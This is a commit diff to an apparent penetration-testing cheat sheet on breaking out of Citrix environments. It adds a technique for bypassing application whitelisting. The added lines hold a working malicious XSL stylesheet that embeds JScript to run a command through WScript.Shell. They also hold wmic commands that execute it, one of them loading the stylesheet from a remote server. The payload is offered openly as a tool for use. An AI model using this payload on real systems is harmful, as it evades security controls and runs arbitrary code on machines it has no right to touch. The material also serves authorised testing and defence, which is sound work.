Update citrix_breakout.txt

darksh3llRU · May 6, 2020 · 237e914 · 237e914
1 parent 381be78
commit 237e914
Showing 1 changed file with 18 additions and 2 deletions.
diff --git a/citrix_breakout.txt b/citrix_breakout.txt
@@ -61,6 +61,22 @@ goto :start
 Click open file location
 -------------------------------------
 -------------------------------------
-10) 
--------------------------------------
+10) Use WMIC,XSL to bypass app whitelisting
+-------------------------------------
+evil.xsl
+<?xml version='1.0'?>
+<stylesheet
+xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
+xmlns:user="placeholder"
+version="1.0">
+<output method="text"/>
+	<ms:script implements-prefix="user" language="JScript">
+	<![CDATA[
+	var r = new ActiveXObject("WScript.Shell").Run("calc");
+	]]> </ms:script>
+</stylesheet>
+
+
+wmic os get /FORMAT:"evil.xsl"
+wmic os get /FORMAT:"https://server/evil.xsl"
 -------------------------------------